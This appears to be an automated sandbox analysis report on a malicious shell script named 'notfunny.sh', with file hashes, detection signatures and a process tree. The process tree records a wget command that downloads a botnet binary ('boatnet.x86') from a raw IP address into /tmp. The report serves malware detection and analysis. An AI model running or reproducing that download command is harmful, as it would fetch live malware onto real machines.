Analysis

  • max time kernel
    149s
  • max time network
    28s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    28/10/2024, 01:18

General

  • Target

    notfunny.sh

  • Size

    3KB

  • MD5

    fc73d6be8e91e575c902e5d3b1834868

  • SHA1

    61880a4da8b19dc7d4d87b5a3d55e0a992aac856

  • SHA256

    9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

  • SHA512

    1a2710fc7254ed255df6389118929be76e435a66e77f58b6065f2771e235295647a7f6f62e008fa3e2ac6bf0126abef05569dc76542a549b608bf94fd657a9a3

Score
5/10
upx

Malware Config

Signatures

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/notfunny.sh
    /tmp/notfunny.sh
    1⤵
      PID:707
      • /usr/bin/wget
        wget http://154.216.19.166:3000/hiddenbin/boatnet.x86
        2⤵
        • Writes file to tmp directory
        PID:710

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /tmp/boatnet.x86

      Filesize

      19KB

      MD5

      54e076b42cc4c7bc77ed783c93733706

      SHA1

      60142c48cd534ab3069378d73a63c87627efb42b

      SHA256

      fbc7b2a7d16b78fc5360b2709692ae863466577e3fd0de5e4245cc2432d33a13

      SHA512

      cabea678a945078356c35a68a2cab192bbb6ceb1c47ca05e9f3b519be4832bdd8ab6d78226617cf5de4b4f19097dcb9ebf142c7259234bd2c6f6118c7adaaa2a